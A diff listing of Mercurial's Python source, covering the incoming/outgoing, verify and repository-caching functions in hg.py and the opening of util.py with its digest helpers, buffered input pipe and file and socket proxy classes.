942 935 displayer = logcmdutil.changesetdisplayer(ui, other, opts,
943 936 buffered=buffered)
944 937 displaychlist(other, chlist, displayer)
945 938 displayer.close()
946 939 finally:
947 940 cleanupfn()
948 941 subreporecurse()
949 942 return 0 # exit code is zero since we found incoming changes
950 943
951 944 def incoming(ui, repo, source, opts):
952 945 def subreporecurse():
953 946 ret = 1
954 947 if opts.get('subrepos'):
955 948 ctx = repo[None]
956 949 for subpath in sorted(ctx.substate):
957 950 sub = ctx.sub(subpath)
958 951 ret = min(ret, sub.incoming(ui, source, opts))
959 952 return ret
960 953
961 954 def display(other, chlist, displayer):
962 955 limit = logcmdutil.getlimit(opts)
963 956 if opts.get('newest_first'):
964 957 chlist.reverse()
965 958 count = 0
966 959 for n in chlist:
967 960 if limit is not None and count >= limit:
968 961 break
969 962 parents = [p for p in other.changelog.parents(n) if p != nullid]
970 963 if opts.get('no_merges') and len(parents) == 2:
971 964 continue
972 965 count += 1
973 966 displayer.show(other[n])
974 967 return _incoming(display, subreporecurse, ui, repo, source, opts)
975 968
976 969 def _outgoing(ui, repo, dest, opts):
977 970 path = ui.paths.getpath(dest, default=('default-push', 'default'))
978 971 if not path:
979 972 raise error.Abort(_('default repository not configured!'),
980 973 hint=_("see 'hg help config.paths'"))
981 974 dest = path.pushloc or path.loc
982 975 branches = path.branch, opts.get('branch') or []
983 976
984 977 ui.status(_('comparing with %s\n') % util.hidepassword(dest))
985 978 revs, checkout = addbranchrevs(repo, repo, branches, opts.get('rev'))
986 979 if revs:
987 980 revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
988 981
989 982 other = peer(repo, opts, dest)
990 983 outgoing = discovery.findcommonoutgoing(repo, other, revs,
991 984 force=opts.get('force'))
992 985 o = outgoing.missing
993 986 if not o:
994 987 scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
995 988 return o, other
996 989
997 990 def outgoing(ui, repo, dest, opts):
998 991 def recurse():
999 992 ret = 1
1000 993 if opts.get('subrepos'):
1001 994 ctx = repo[None]
1002 995 for subpath in sorted(ctx.substate):
1003 996 sub = ctx.sub(subpath)
1004 997 ret = min(ret, sub.outgoing(ui, dest, opts))
1005 998 return ret
1006 999
1007 1000 limit = logcmdutil.getlimit(opts)
1008 1001 o, other = _outgoing(ui, repo, dest, opts)
1009 1002 if not o:
1010 1003 cmdutil.outgoinghooks(ui, repo, other, opts, o)
1011 1004 return recurse()
1012 1005
1013 1006 if opts.get('newest_first'):
1014 1007 o.reverse()
1015 1008 ui.pager('outgoing')
1016 1009 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
1017 1010 count = 0
1018 1011 for n in o:
1019 1012 if limit is not None and count >= limit:
1020 1013 break
1021 1014 parents = [p for p in repo.changelog.parents(n) if p != nullid]
1022 1015 if opts.get('no_merges') and len(parents) == 2:
1023 1016 continue
1024 1017 count += 1
1025 1018 displayer.show(repo[n])
1026 1019 displayer.close()
1027 1020 cmdutil.outgoinghooks(ui, repo, other, opts, o)
1028 1021 recurse()
1029 1022 return 0 # exit code is zero since we found outgoing changes
1030 1023
1031 1024 def verify(repo):
1032 1025 """verify the consistency of a repository"""
1033 1026 ret = verifymod.verify(repo)
1034 1027
1035 1028 # Broken subrepo references in hidden csets don't seem worth worrying about,
1036 1029 # since they can't be pushed/pulled, and --hidden can be used if they are a
1037 1030 # concern.
1038 1031
1039 1032 # pathto() is needed for -R case
1040 1033 revs = repo.revs("filelog(%s)",
1041 1034 util.pathto(repo.root, repo.getcwd(), '.hgsubstate'))
1042 1035
1043 1036 if revs:
1044 1037 repo.ui.status(_('checking subrepo links\n'))
1045 1038 for rev in revs:
1046 1039 ctx = repo[rev]
1047 1040 try:
1048 1041 for subpath in ctx.substate:
1049 1042 try:
1050 1043 ret = (ctx.sub(subpath, allowcreate=False).verify()
1051 1044 or ret)
1052 1045 except error.RepoError as e:
1053 1046 repo.ui.warn(('%d: %s\n') % (rev, e))
1054 1047 except Exception:
1055 1048 repo.ui.warn(_('.hgsubstate is corrupt in revision %s\n') %
1056 1049 node.short(ctx.node()))
1057 1050
1058 1051 return ret
1059 1052
1060 1053 def remoteui(src, opts):
1061 1054 'build a remote ui from ui or repo and opts'
1062 1055 if util.safehasattr(src, 'baseui'): # looks like a repository
1063 1056 dst = src.baseui.copy() # drop repo-specific config
1064 1057 src = src.ui # copy target options from repo
1065 1058 else: # assume it's a global ui object
1066 1059 dst = src.copy() # keep all global options
1067 1060
1068 1061 # copy ssh-specific options
1069 1062 for o in 'ssh', 'remotecmd':
1070 1063 v = opts.get(o) or src.config('ui', o)
1071 1064 if v:
1072 1065 dst.setconfig("ui", o, v, 'copied')
1073 1066
1074 1067 # copy bundle-specific options
1075 1068 r = src.config('bundle', 'mainreporoot')
1076 1069 if r:
1077 1070 dst.setconfig('bundle', 'mainreporoot', r, 'copied')
1078 1071
1079 1072 # copy selected local settings to the remote ui
1080 1073 for sect in ('auth', 'hostfingerprints', 'hostsecurity', 'http_proxy'):
1081 1074 for key, val in src.configitems(sect):
1082 1075 dst.setconfig(sect, key, val, 'copied')
1083 1076 v = src.config('web', 'cacerts')
1084 1077 if v:
1085 1078 dst.setconfig('web', 'cacerts', util.expandpath(v), 'copied')
1086 1079
1087 1080 return dst
1088 1081
1089 1082 # Files of interest
1090 1083 # Used to check if the repository has changed looking at mtime and size of
1091 1084 # these files.
1092 1085 foi = [('spath', '00changelog.i'),
1093 1086 ('spath', 'phaseroots'), # ! phase can change content at the same size
1094 1087 ('spath', 'obsstore'),
1095 1088 ('path', 'bookmarks'), # ! bookmark can change content at the same size
1096 1089 ]
1097 1090
1098 1091 class cachedlocalrepo(object):
1099 1092 """Holds a localrepository that can be cached and reused."""
1100 1093
1101 1094 def __init__(self, repo):
1102 1095 """Create a new cached repo from an existing repo.
1103 1096
1104 1097 We assume the passed in repo was recently created. If the
1105 1098 repo has changed between when it was created and when it was
1106 1099 turned into a cache, it may not refresh properly.
1107 1100 """
1108 1101 assert isinstance(repo, localrepo.localrepository)
1109 1102 self._repo = repo
1110 1103 self._state, self.mtime = self._repostate()
1111 1104 self._filtername = repo.filtername
1112 1105
1113 1106 def fetch(self):
1114 1107 """Refresh (if necessary) and return a repository.
1115 1108
1116 1109 If the cached instance is out of date, it will be recreated
1117 1110 automatically and returned.
1118 1111
1119 1112 Returns a tuple of the repo and a boolean indicating whether a new
1120 1113 repo instance was created.
1121 1114 """
1122 1115 # We compare the mtimes and sizes of some well-known files to
1123 1116 # determine if the repo changed. This is not precise, as mtimes
1124 1117 # are susceptible to clock skew and imprecise filesystems and
1125 1118 # file content can change while maintaining the same size.
1126 1119
1127 1120 state, mtime = self._repostate()
1128 1121 if state == self._state:
1129 1122 return self._repo, False
1130 1123
1131 1124 repo = repository(self._repo.baseui, self._repo.url())
1132 1125 if self._filtername:
1133 1126 self._repo = repo.filtered(self._filtername)
1134 1127 else:
1135 1128 self._repo = repo.unfiltered()
1136 1129 self._state = state
1137 1130 self.mtime = mtime
1138 1131
1139 1132 return self._repo, True
1140 1133
1141 1134 def _repostate(self):
1142 1135 state = []
1143 1136 maxmtime = -1
1144 1137 for attr, fname in foi:
1145 1138 prefix = getattr(self._repo, attr)
1146 1139 p = os.path.join(prefix, fname)
1147 1140 try:
1148 1141 st = os.stat(p)
1149 1142 except OSError:
1150 1143 st = os.stat(prefix)
1151 1144 state.append((st[stat.ST_MTIME], st.st_size))
1152 1145 maxmtime = max(maxmtime, st[stat.ST_MTIME])
1153 1146
1154 1147 return tuple(state), maxmtime
1155 1148
1156 1149 def copy(self):
1157 1150 """Obtain a copy of this class instance.
1158 1151
1159 1152 A new localrepository instance is obtained. The new instance should be
1160 1153 completely independent of the original.
1161 1154 """
1162 1155 repo = repository(self._repo.baseui, self._repo.origroot)
1163 1156 if self._filtername:
1164 1157 repo = repo.filtered(self._filtername)
1165 1158 else:
1166 1159 repo = repo.unfiltered()
1167 1160 c = cachedlocalrepo(repo)
1168 1161 c._state = self._state
1169 1162 c.mtime = self.mtime
1170 1163 return c
@@ -1,3790 +1,3789 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from . import (
40 40 encoding,
41 41 error,
42 42 i18n,
43 43 node as nodemod,
44 44 policy,
45 45 pycompat,
46 46 urllibcompat,
47 47 )
48 48 from .utils import (
49 49 procutil,
50 50 stringutil,
51 51 )
52 52
53 53 base85 = policy.importmod(r'base85')
54 54 osutil = policy.importmod(r'osutil')
55 55 parsers = policy.importmod(r'parsers')
56 56
57 57 b85decode = base85.b85decode
58 58 b85encode = base85.b85encode
59 59
60 60 cookielib = pycompat.cookielib
61 61 httplib = pycompat.httplib
62 62 pickle = pycompat.pickle
63 63 safehasattr = pycompat.safehasattr
64 64 socketserver = pycompat.socketserver
65 65 bytesio = pycompat.bytesio
66 66 # TODO deprecate stringio name, as it is a lie on Python 3.
67 67 stringio = bytesio
68 68 xmlrpclib = pycompat.xmlrpclib
69 69
70 70 httpserver = urllibcompat.httpserver
71 71 urlerr = urllibcompat.urlerr
72 72 urlreq = urllibcompat.urlreq
73 73
74 74 # workaround for win32mbcs
75 75 _filenamebytestr = pycompat.bytestr
76 76
77 77 if pycompat.iswindows:
78 78 from . import windows as platform
79 79 else:
80 80 from . import posix as platform
81 81
82 82 _ = i18n._
83 83
84 84 bindunixsocket = platform.bindunixsocket
85 85 cachestat = platform.cachestat
86 86 checkexec = platform.checkexec
87 87 checklink = platform.checklink
88 88 copymode = platform.copymode
89 89 expandglobs = platform.expandglobs
90 90 getfsmountpoint = platform.getfsmountpoint
91 91 getfstype = platform.getfstype
92 92 groupmembers = platform.groupmembers
93 93 groupname = platform.groupname
94 94 isexec = platform.isexec
95 95 isowner = platform.isowner
96 96 listdir = osutil.listdir
97 97 localpath = platform.localpath
98 98 lookupreg = platform.lookupreg
99 99 makedir = platform.makedir
100 100 nlinks = platform.nlinks
101 101 normpath = platform.normpath
102 102 normcase = platform.normcase
103 103 normcasespec = platform.normcasespec
104 104 normcasefallback = platform.normcasefallback
105 105 openhardlinks = platform.openhardlinks
106 106 oslink = platform.oslink
107 107 parsepatchoutput = platform.parsepatchoutput
108 108 pconvert = platform.pconvert
109 109 poll = platform.poll
110 110 posixfile = platform.posixfile
111 111 rename = platform.rename
112 112 removedirs = platform.removedirs
113 113 samedevice = platform.samedevice
114 114 samefile = platform.samefile
115 115 samestat = platform.samestat
116 116 setflags = platform.setflags
117 117 split = platform.split
118 118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 119 statisexec = platform.statisexec
120 120 statislink = platform.statislink
121 121 umask = platform.umask
122 122 unlink = platform.unlink
123 123 username = platform.username
124 124
125 125 try:
126 126 recvfds = osutil.recvfds
127 127 except AttributeError:
128 128 pass
129 129
130 130 # Python compatibility
131 131
132 132 _notset = object()
133 133
134 134 def _rapply(f, xs):
135 135 if xs is None:
136 136 # assume None means non-value of optional data
137 137 return xs
138 138 if isinstance(xs, (list, set, tuple)):
139 139 return type(xs)(_rapply(f, x) for x in xs)
140 140 if isinstance(xs, dict):
141 141 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
142 142 return f(xs)
143 143
144 144 def rapply(f, xs):
145 145 """Apply function recursively to every item preserving the data structure
146 146
147 147 >>> def f(x):
148 148 ... return 'f(%s)' % x
149 149 >>> rapply(f, None) is None
150 150 True
151 151 >>> rapply(f, 'a')
152 152 'f(a)'
153 153 >>> rapply(f, {'a'}) == {'f(a)'}
154 154 True
155 155 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
156 156 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
157 157
158 158 >>> xs = [object()]
159 159 >>> rapply(pycompat.identity, xs) is xs
160 160 True
161 161 """
162 162 if f is pycompat.identity:
163 163 # fast path mainly for py2
164 164 return xs
165 165 return _rapply(f, xs)
166 166
167 167 def bitsfrom(container):
168 168 bits = 0
169 169 for bit in container:
170 170 bits |= bit
171 171 return bits
172 172
173 173 # python 2.6 still have deprecation warning enabled by default. We do not want
174 174 # to display anything to standard user so detect if we are running test and
175 175 # only use python deprecation warning in this case.
176 176 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
177 177 if _dowarn:
178 178 # explicitly unfilter our warning for python 2.7
179 179 #
180 180 # The option of setting PYTHONWARNINGS in the test runner was investigated.
181 181 # However, module name set through PYTHONWARNINGS was exactly matched, so
182 182 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
183 183 # makes the whole PYTHONWARNINGS thing useless for our usecase.
184 184 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
185 185 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
186 186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
187 187 if _dowarn and pycompat.ispy3:
188 188 # silence warning emitted by passing user string to re.sub()
189 189 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
190 190 r'mercurial')
191 191 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
192 192 DeprecationWarning, r'mercurial')
193 193 # TODO: reinvent imp.is_frozen()
194 194 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
195 195 DeprecationWarning, r'mercurial')
196 196
197 197 def nouideprecwarn(msg, version, stacklevel=1):
198 198 """Issue an python native deprecation warning
199 199
200 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 201 """
202 202 if _dowarn:
203 203 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
204 204 " update your code.)") % version
205 205 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
206 206
207 207 DIGESTS = {
208 208 'md5': hashlib.md5,
209 209 'sha1': hashlib.sha1,
210 210 'sha512': hashlib.sha512,
211 211 }
212 212 # List of digest types from strongest to weakest
213 213 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
214 214
215 215 for k in DIGESTS_BY_STRENGTH:
216 216 assert k in DIGESTS
217 217
218 218 class digester(object):
219 219 """helper to compute digests.
220 220
221 221 This helper can be used to compute one or more digests given their name.
222 222
223 223 >>> d = digester([b'md5', b'sha1'])
224 224 >>> d.update(b'foo')
225 225 >>> [k for k in sorted(d)]
226 226 ['md5', 'sha1']
227 227 >>> d[b'md5']
228 228 'acbd18db4cc2f85cedef654fccc4a4d8'
229 229 >>> d[b'sha1']
230 230 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
231 231 >>> digester.preferred([b'md5', b'sha1'])
232 232 'sha1'
233 233 """
234 234
235 235 def __init__(self, digests, s=''):
236 236 self._hashes = {}
237 237 for k in digests:
238 238 if k not in DIGESTS:
239 239 raise error.Abort(_('unknown digest type: %s') % k)
240 240 self._hashes[k] = DIGESTS[k]()
241 241 if s:
242 242 self.update(s)
243 243
244 244 def update(self, data):
245 245 for h in self._hashes.values():
246 246 h.update(data)
247 247
248 248 def __getitem__(self, key):
249 249 if key not in DIGESTS:
250 250 raise error.Abort(_('unknown digest type: %s') % k)
251 251 return nodemod.hex(self._hashes[key].digest())
252 252
253 253 def __iter__(self):
254 254 return iter(self._hashes)
255 255
256 256 @staticmethod
257 257 def preferred(supported):
258 258 """returns the strongest digest type in both supported and DIGESTS."""
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 if k in supported:
262 262 return k
263 263 return None
264 264
265 265 class digestchecker(object):
266 266 """file handle wrapper that additionally checks content against a given
267 267 size and digests.
268 268
269 269 d = digestchecker(fh, size, {'md5': '...'})
270 270
271 271 When multiple digests are given, all of them are validated.
272 272 """
273 273
274 274 def __init__(self, fh, size, digests):
275 275 self._fh = fh
276 276 self._size = size
277 277 self._got = 0
278 278 self._digests = dict(digests)
279 279 self._digester = digester(self._digests.keys())
280 280
281 281 def read(self, length=-1):
282 282 content = self._fh.read(length)
283 283 self._digester.update(content)
284 284 self._got += len(content)
285 285 return content
286 286
287 287 def validate(self):
288 288 if self._size != self._got:
289 289 raise error.Abort(_('size mismatch: expected %d, got %d') %
290 290 (self._size, self._got))
291 291 for k, v in self._digests.items():
292 292 if v != self._digester[k]:
293 293 # i18n: first parameter is a digest name
294 294 raise error.Abort(_('%s mismatch: expected %s, got %s') %
295 295 (k, v, self._digester[k]))
296 296
297 297 try:
298 298 buffer = buffer
299 299 except NameError:
300 300 def buffer(sliceable, offset=0, length=None):
301 301 if length is not None:
302 302 return memoryview(sliceable)[offset:offset + length]
303 303 return memoryview(sliceable)[offset:]
304 304
305 305 _chunksize = 4096
306 306
307 307 class bufferedinputpipe(object):
308 308 """a manually buffered input pipe
309 309
310 310 Python will not let us use buffered IO and lazy reading with 'polling' at
311 311 the same time. We cannot probe the buffer state and select will not detect
312 312 that data are ready to read if they are already buffered.
313 313
314 314 This class let us work around that by implementing its own buffering
315 315 (allowing efficient readline) while offering a way to know if the buffer is
316 316 empty from the output (allowing collaboration of the buffer with polling).
317 317
318 318 This class lives in the 'util' module because it makes use of the 'os'
319 319 module from the python stdlib.
320 320 """
321 321 def __new__(cls, fh):
322 322 # If we receive a fileobjectproxy, we need to use a variation of this
323 323 # class that notifies observers about activity.
324 324 if isinstance(fh, fileobjectproxy):
325 325 cls = observedbufferedinputpipe
326 326
327 327 return super(bufferedinputpipe, cls).__new__(cls)
328 328
329 329 def __init__(self, input):
330 330 self._input = input
331 331 self._buffer = []
332 332 self._eof = False
333 333 self._lenbuf = 0
334 334
335 335 @property
336 336 def hasbuffer(self):
337 337 """True is any data is currently buffered
338 338
339 339 This will be used externally a pre-step for polling IO. If there is
340 340 already data then no polling should be set in place."""
341 341 return bool(self._buffer)
342 342
343 343 @property
344 344 def closed(self):
345 345 return self._input.closed
346 346
347 347 def fileno(self):
348 348 return self._input.fileno()
349 349
350 350 def close(self):
351 351 return self._input.close()
352 352
353 353 def read(self, size):
354 354 while (not self._eof) and (self._lenbuf < size):
355 355 self._fillbuffer()
356 356 return self._frombuffer(size)
357 357
358 358 def readline(self, *args, **kwargs):
359 359 if 1 < len(self._buffer):
360 360 # this should not happen because both read and readline end with a
361 361 # _frombuffer call that collapse it.
362 362 self._buffer = [''.join(self._buffer)]
363 363 self._lenbuf = len(self._buffer[0])
364 364 lfi = -1
365 365 if self._buffer:
366 366 lfi = self._buffer[-1].find('\n')
367 367 while (not self._eof) and lfi < 0:
368 368 self._fillbuffer()
369 369 if self._buffer:
370 370 lfi = self._buffer[-1].find('\n')
371 371 size = lfi + 1
372 372 if lfi < 0: # end of file
373 373 size = self._lenbuf
374 374 elif 1 < len(self._buffer):
375 375 # we need to take previous chunks into account
376 376 size += self._lenbuf - len(self._buffer[-1])
377 377 return self._frombuffer(size)
378 378
379 379 def _frombuffer(self, size):
380 380 """return at most 'size' data from the buffer
381 381
382 382 The data are removed from the buffer."""
383 383 if size == 0 or not self._buffer:
384 384 return ''
385 385 buf = self._buffer[0]
386 386 if 1 < len(self._buffer):
387 387 buf = ''.join(self._buffer)
388 388
389 389 data = buf[:size]
390 390 buf = buf[len(data):]
391 391 if buf:
392 392 self._buffer = [buf]
393 393 self._lenbuf = len(buf)
394 394 else:
395 395 self._buffer = []
396 396 self._lenbuf = 0
397 397 return data
398 398
399 399 def _fillbuffer(self):
400 400 """read data to the buffer"""
401 401 data = os.read(self._input.fileno(), _chunksize)
402 402 if not data:
403 403 self._eof = True
404 404 else:
405 405 self._lenbuf += len(data)
406 406 self._buffer.append(data)
407 407
408 408 return data
409 409
410 410 def mmapread(fp):
411 411 try:
412 412 fd = getattr(fp, 'fileno', lambda: fp)()
413 413 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
414 414 except ValueError:
415 415 # Empty files cannot be mmapped, but mmapread should still work. Check
416 416 # if the file is empty, and if so, return an empty buffer.
417 417 if os.fstat(fd).st_size == 0:
418 418 return ''
419 419 raise
420 420
421 421 class fileobjectproxy(object):
422 422 """A proxy around file objects that tells a watcher when events occur.
423 423
424 424 This type is intended to only be used for testing purposes. Think hard
425 425 before using it in important code.
426 426 """
427 427 __slots__ = (
428 428 r'_orig',
429 429 r'_observer',
430 430 )
431 431
432 432 def __init__(self, fh, observer):
433 433 object.__setattr__(self, r'_orig', fh)
434 434 object.__setattr__(self, r'_observer', observer)
435 435
436 436 def __getattribute__(self, name):
437 437 ours = {
438 438 r'_observer',
439 439
440 440 # IOBase
441 441 r'close',
442 442 # closed if a property
443 443 r'fileno',
444 444 r'flush',
445 445 r'isatty',
446 446 r'readable',
447 447 r'readline',
448 448 r'readlines',
449 449 r'seek',
450 450 r'seekable',
451 451 r'tell',
452 452 r'truncate',
453 453 r'writable',
454 454 r'writelines',
455 455 # RawIOBase
456 456 r'read',
457 457 r'readall',
458 458 r'readinto',
459 459 r'write',
460 460 # BufferedIOBase
461 461 # raw is a property
462 462 r'detach',
463 463 # read defined above
464 464 r'read1',
465 465 # readinto defined above
466 466 # write defined above
467 467 }
468 468
469 469 # We only observe some methods.
470 470 if name in ours:
471 471 return object.__getattribute__(self, name)
472 472
473 473 return getattr(object.__getattribute__(self, r'_orig'), name)
474 474
475 475 def __nonzero__(self):
476 476 return bool(object.__getattribute__(self, r'_orig'))
477 477
478 478 __bool__ = __nonzero__
479 479
480 480 def __delattr__(self, name):
481 481 return delattr(object.__getattribute__(self, r'_orig'), name)
482 482
483 483 def __setattr__(self, name, value):
484 484 return setattr(object.__getattribute__(self, r'_orig'), name, value)
485 485
486 486 def __iter__(self):
487 487 return object.__getattribute__(self, r'_orig').__iter__()
488 488
489 489 def _observedcall(self, name, *args, **kwargs):
490 490 # Call the original object.
491 491 orig = object.__getattribute__(self, r'_orig')
492 492 res = getattr(orig, name)(*args, **kwargs)
493 493
494 494 # Call a method on the observer of the same name with arguments
495 495 # so it can react, log, etc.
496 496 observer = object.__getattribute__(self, r'_observer')
497 497 fn = getattr(observer, name, None)
498 498 if fn:
499 499 fn(res, *args, **kwargs)
500 500
501 501 return res
502 502
503 503 def close(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'close', *args, **kwargs)
506 506
507 507 def fileno(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'fileno', *args, **kwargs)
510 510
511 511 def flush(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'flush', *args, **kwargs)
514 514
515 515 def isatty(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'isatty', *args, **kwargs)
518 518
519 519 def readable(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'readable', *args, **kwargs)
522 522
523 523 def readline(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'readline', *args, **kwargs)
526 526
527 527 def readlines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'readlines', *args, **kwargs)
530 530
531 531 def seek(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'seek', *args, **kwargs)
534 534
535 535 def seekable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'seekable', *args, **kwargs)
538 538
539 539 def tell(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'tell', *args, **kwargs)
542 542
543 543 def truncate(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'truncate', *args, **kwargs)
546 546
547 547 def writable(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'writable', *args, **kwargs)
550 550
551 551 def writelines(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'writelines', *args, **kwargs)
554 554
555 555 def read(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'read', *args, **kwargs)
558 558
559 559 def readall(self, *args, **kwargs):
560 560 return object.__getattribute__(self, r'_observedcall')(
561 561 r'readall', *args, **kwargs)
562 562
563 563 def readinto(self, *args, **kwargs):
564 564 return object.__getattribute__(self, r'_observedcall')(
565 565 r'readinto', *args, **kwargs)
566 566
567 567 def write(self, *args, **kwargs):
568 568 return object.__getattribute__(self, r'_observedcall')(
569 569 r'write', *args, **kwargs)
570 570
571 571 def detach(self, *args, **kwargs):
572 572 return object.__getattribute__(self, r'_observedcall')(
573 573 r'detach', *args, **kwargs)
574 574
575 575 def read1(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'read1', *args, **kwargs)
578 578
579 579 class observedbufferedinputpipe(bufferedinputpipe):
580 580 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
581 581
582 582 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
583 583 bypass ``fileobjectproxy``. Because of this, we need to make
584 584 ``bufferedinputpipe`` aware of these operations.
585 585
586 586 This variation of ``bufferedinputpipe`` can notify observers about
587 587 ``os.read()`` events. It also re-publishes other events, such as
588 588 ``read()`` and ``readline()``.
589 589 """
590 590 def _fillbuffer(self):
591 591 res = super(observedbufferedinputpipe, self)._fillbuffer()
592 592
593 593 fn = getattr(self._input._observer, r'osread', None)
594 594 if fn:
595 595 fn(res, _chunksize)
596 596
597 597 return res
598 598
599 599 # We use different observer methods because the operation isn't
600 600 # performed on the actual file object but on us.
601 601 def read(self, size):
602 602 res = super(observedbufferedinputpipe, self).read(size)
603 603
604 604 fn = getattr(self._input._observer, r'bufferedread', None)
605 605 if fn:
606 606 fn(res, size)
607 607
608 608 return res
609 609
610 610 def readline(self, *args, **kwargs):
611 611 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
612 612
613 613 fn = getattr(self._input._observer, r'bufferedreadline', None)
614 614 if fn:
615 615 fn(res)
616 616
617 617 return res
618 618
619 619 PROXIED_SOCKET_METHODS = {
620 620 r'makefile',
621 621 r'recv',
622 622 r'recvfrom',
623 623 r'recvfrom_into',
624 624 r'recv_into',
625 625 r'send',
626 626 r'sendall',
627 627 r'sendto',
628 628 r'setblocking',
629 629 r'settimeout',
630 630 r'gettimeout',
631 631 r'setsockopt',
632 632 }
633 633
634 634 class socketproxy(object):
635 635 """A proxy around a socket that tells a watcher when events occur.
636 636
637 637 This is like ``fileobjectproxy`` except for sockets.
638 638
639 639 This type is intended to only be used for testing purposes. Think hard
640 640 before using it in important code.
641 641 """
642 642 __slots__ = (
643 643 r'_orig',
644 644 r'_observer',
645 645 )
646 646
647 647 def __init__(self, sock, observer):
648 648 object.__setattr__(self, r'_orig', sock)
649 649 object.__setattr__(self, r'_observer', observer)
650 650
651 651 def __getattribute__(self, name):
652 652 if name in PROXIED_SOCKET_METHODS:
653 653 return object.__getattribute__(self, name)
654 654
655 655 return getattr(object.__getattribute__(self, r'_orig'), name)
656 656
657 657 def __delattr__(self, name):
658 658 return delattr(object.__getattribute__(self, r'_orig'), name)
659 659
660 660 def __setattr__(self, name, value):
661 661 return setattr(object.__getattribute__(self, r'_orig'), name, value)
662 662
663 663 def __nonzero__(self):
664 664 return bool(object.__getattribute__(self, r'_orig'))
665 665
666 666 __bool__ = __nonzero__
667 667
668 668 def _observedcall(self, name, *args, **kwargs):
669 669 # Call the original object.
670 670 orig = object.__getattribute__(self, r'_orig')
671 671 res = getattr(orig, name)(*args, **kwargs)
672 672
673 673 # Call a method on the observer of the same name with arguments
674 674 # so it can react, log, etc.
675 675 observer = object.__getattribute__(self, r'_observer')
676 676 fn = getattr(observer, name, None)
677 677 if fn:
678 678 fn(res, *args, **kwargs)
679 679
680 680 return res
681 681
682 682 def makefile(self, *args, **kwargs):
683 683 res = object.__getattribute__(self, r'_observedcall')(
684 684 r'makefile', *args, **kwargs)
685 685
686 686 # The file object may be used for I/O. So we turn it into a
687 687 # proxy using our observer.
688 688 observer = object.__getattribute__(self, r'_observer')
689 689 return makeloggingfileobject(observer.fh, res, observer.name,
690 690 reads=observer.reads,
691 691 writes=observer.writes,
692 692 logdata=observer.logdata,
693 693 logdataapis=observer.logdataapis)
694 694
695 695 def recv(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'recv', *args, **kwargs)
698 698
699 699 def recvfrom(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'recvfrom', *args, **kwargs)
702 702
703 703 def recvfrom_into(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'recvfrom_into', *args, **kwargs)
706 706
707 707 def recv_into(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'recv_info', *args, **kwargs)
710 710
711 711 def send(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'send', *args, **kwargs)
714 714
715 715 def sendall(self, *args, **kwargs):
716 716 return object.__getattribute__(self, r'_observedcall')(
717 717 r'sendall', *args, **kwargs)
718 718
